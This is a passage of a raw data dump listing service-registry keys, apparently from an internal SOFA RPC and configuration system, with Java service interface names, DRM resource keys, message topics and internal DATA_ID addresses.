Callback:1.0:developerops@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.116.71#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dwalm.core.service.fluidmng.cash.suggest.CashDemandSuggestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppprod.common.service.facade.businesshall.BusinessHallSignQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.order.SysCallMsgService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifprocess.custdpc.scheduler.SchedulerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.almcenter.service.facade.api.activity.ActivityResultManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.secretary.manager.WorkAssistantSceneManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.shared.manager.drm.MbaasDRMImpl.restApiWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insliveprod.common.service.facade.ProgramFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.193.237#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.caprod.common.dal.daointerface.UkeyCertDetailInfoDAO:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.117.249#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.definfund.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.superapi.common.core.client.AppInvokeService:1.0:gfsettleprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:envcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.financeprod:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.loancore.common.service.facade.alipay.api.ZlcRiskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.follow.api.UserFollowingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_ORDER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilelbs.common.service.facade.spatial.service.SpatialLBSQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.appserviceversion.ServerlessAppServiceVersionFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditbill.facade.service.PcreditBillAccountBalanceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paylink.core.inner.route.InnerRouteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterMerchantUnionDrmResource.arrangementProductCodesString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.paramcore.common.service.manage.facade.api.bizspace.BusinessSpaceConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.inspectprod.common.service.trigger.inspect.ManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.dsmp.common.service.facade.privilege.service.v2.StrategyServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.preprocess.ContentPreprocessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.malgo.common.facade.LambdaControlValueFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bizprod.common.service.facade.api.ApbizMemberQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.192.140#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchasset.common.service.facade.qrcode.AssetQrCodeActiveFacade:1.0:mrchasset_default_assetQrCodeActive@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.0.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:familycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.manage.facade.api.ParmInstanceConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:fundselling@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanrepayprod.common.service.facade.service.ar.RepayArQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.common.service.facade.YebTradeOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchorder.biz.shared.order.processor.inner.ProcessInnerRouteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.facade.api.product.ProductService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.yebscene.query.YebcAccessQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.galaxy.FinOutfluxGalaxyQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.FundAppointmentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.delivery.AssetDeliveryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundbankcore.common.service.facade.FundBankPurchaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.common.AssetBizLineChannelManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_KBSHOPDECORATE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@mfinbaseprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:pcmerchantprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:insiopweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.167.199.204#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.dayutrprod.common.facade.monitor.DiagnoseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.promorulecenter.common.service.facade.PromoRuleAnalyzeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.promox.facade.crowd.CrowdValidateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.sqlParamCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:finsign@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.grsettle.facade.api.budget.BudgetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uioservice.common.service.facade.api.LabelEnumsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.common.service.facade.censor.CensorSheetHandlerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.alsc.tmall.TmallSellerAlscQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshyorg.com.service.integration.lifmsgprod.ChannelMessageFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.qa.SupportIntelligentSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.236.117#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mirrorprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insofflineinvest.common.service.facade.service.InvestAppealAntToDoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.necquery.common.service.contract.ContractQueryNewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.mextitemcenter.common.facade.api.ApplyCancelRecordManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bksigncentre.common.service.facade.api.SaleSchemeOrderOperateFacade:1.0:bksigncentre_saleSchemeOrderOperateFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP-S-TRADE-BATCH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.katongprod.common.service.facade.management.SupergwParamMappingQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.riskmng_pmcShineDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.oceanbase.obforumcore.service.open.activity.ActivitySignUpOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.spi.FinalizeService:1.0:finfundprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.policy.SecurityPolicyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.generic.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.l2cache.L2CacheClientSwitch.readL1Cache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rmsdeploy.common.service.facade.CDNFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:insxhcprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mmtcaftscmdproc.common.service.facade.OtaDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finpwm:name=com.alipay.finpwm.biz.ryb.drm.RYBParamDrmManager.rybProductListWhitelist,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcap_pre_open_account_task@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsop.common.service.facade.api.EleShopCheckManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcbenefitcore.facade.api.voucher.BFVoucherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_FAMILY_POINT_TOPIC_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.common.core.client.AppInvokeService:1.0:fcprocess@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custview.facade.AuthorityRuleCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.pcreditamount.service.PcreditAmountInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.securitycap:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInBizValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.trsbrain.common.service.facade.spi.BizSelfCureServiceFacade:1.0:trsbrain-common@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gmodelcenter.common.service.api.standard.index.IndexFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.20.234.71#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.recquality.common.service.facade.api.AntVenusIntelligentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcepcore.common.service.facade.api.CoinInfoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pricemng.common.service.facade.api.price.PricemngPriceCompareFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.common.service.facade.api.elm.InsSceneOrderApplyApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.biz.union.drm.MerchantUnionParamsDrmResource.processOperation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openitemcore.common.service.facade.api.ordercore.OrderLineImplementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.antcloud.MiniAppAntcloudQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_M_MSGBENCHMARK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acpmscore.facade.CostStatisticFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.shared.repository.AssetRedeemOrderRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:iopenhome@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.ChangeServiceSyncExecuteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshysale.common.service.facade.staff.StaffSeatQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.fluxconf.service.facade.ctrl.DataClientFetchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchiswisdom.common.service.facade.api.system.JobSystemProviderManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecsa.common.service.facade.config.McsaConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobileappcommon.common.service.facade.baas.OperationLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ipsponsorprod.core.service.repository.cashbackmall.EarnLuckyPointTaskTransRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.midasCommonTair.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inshealthserviceprod.common.service.facade.api.HealthServiceDrugUserQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mfinquotationprod.common.service.facade.api.IndicatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:membership_fee_pay_service@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.csshield.InfoSafetyInspectionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.GlobalUserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.242.138#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secucommunity.common.service.facade.relation.api.RelationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.falcon.facade.api.L2SnapshotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecsign.common.service.facade.template.TemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reading.common.service.facade.game.TriggerCompensateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtemplate.common.service.facade.manage.AuthorityManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.card.StockCardFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchainbankloan.facade.api.eaccount.EAccountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.swiftweb.facade.AntCloudFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airbops.service.common.proxy.mapitool.facade.ProxyResponseBuildFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipPromoteResource.clearTask,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.agdsccalipay.jiebei.facade.service.JieBeiTempAmtFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:linkt@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.dds.zdalproxy.interfaces.endpoint.facade.rest.api.SchemaAttributeApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.46.37#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:linkw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobiletms.senior.common.service.facade.api.TemplateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.AssetProfileDrm.switchFlagForTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.20.142.31#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.oceanbase.obforumcore.service.video.VideoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbminiapp.common.service.facade.tr.rutao.AppDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreRzoneTair_dest.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.216.26#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gffintrade.common.service.facade.api.WriteOffManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.44.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.itransferprod.service.facade.api.WithdrawService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findefencecore.common.service.accm.facade.AccmMailServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.facade.standard.api.arrangement.ArBatchQueryStdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_ALIPAY_RATE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","CONFREG_MACHINE_IP_PUBLISHER#@#DEFAULT_INSTANCE_ID#@#PCREDITSCHEDULE","com.antgroup.antchain.myentcore.common.service.facade.api.WithdrawService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqInfluenceNormalizationDrm.paperMediaInfluenceThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clearingcenter.facade.api.LiquidateInstructionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcap_user_notify_timeout_task@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.161#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antfeaturelib.common.facade.service.FeatureCalcService:1.0:publicDomain_fininsightcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.77#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.rtfc.offline.common.task.meta.spi.OfflineTaskMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfac.common.service.facade.GlQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.workflow.common.service.facade.api.tsd.TsdAbilityFacade:1.0:mservice_workflow_intelligentWorkflowAbilityFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admediamgr.common.service.facade.service.MediaRegisterServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:qconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanrepayprod.common.service.facade.service.repay.RepaySchemaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.SimulateModeFixedData2NewDrmImpl.simulateModeLoadExecuteType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:mobileic@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mrchstm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bioperation.service.facade.api.TowerParamManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatacontextLoadTestTBaseCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.service.facade.unifiedcredit.api.UctransTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencommon.config.ConfigManageService:1.0:openctrl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP-TEST001_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.160.177.46#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ordermng.common.service.api.merchant.BizRelationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.admin.SyncTaskAdminApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfund.common.service.facade.common.UniqueInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:peerpay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitradeadapter.core.notify.CommerceEventDispatcher:1.0:commerceEventDispatcherService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vein.winbillboard.common.service.facade.fk.FkDataQuery:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloandecision.common.service.facade.service.PcLoanPageVersionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:kbsales@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordermng.common.service.api.switchcomponent.SwitchControlService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.30.54#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.BPInstanceQueryFacade:1.0:antprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkscmprod_scpPoolLoanArCheckApproval@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifecustprod.common.service.facade.following.FollowingComponentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantSiteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.grmcore.common.service.facade.entity.EntityChangeLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopencore.common.service.interaction.facade.InteractionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.aip.FundFixedManageWrapFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.forexprod.biz.capture.ws.ForexCaptureProcessService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.TaskInnerSetupService:1.0.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.sandboxhome.apaylife_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpwm.facade.api.PersonalWealthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.antqnamesrv:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-giftprod-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.bioperation.service.facade.trade.TradeCreateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlbs.facade.fence.FenceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bktradecore.common.service.facade.api.agreement.NoticeAgreementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.appointment.AppointmentConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.CommonABTestFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecoqltprod.common.service.facade.lifeapp.LifeappFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.cardbinMdmTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.agdsccalipay.jiebei.facade.service.ByjCreditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:forexRateCallbackProcessor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.account.MatcherSendMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.49.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zpaas:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.exratecenter.service.facade.api.ExOriginRateMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:imasp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alcontract.common.service.facade.ContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.routeClient:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ioteds.metadata.app.api.AppMetadataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmmorse.facade.MorseProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.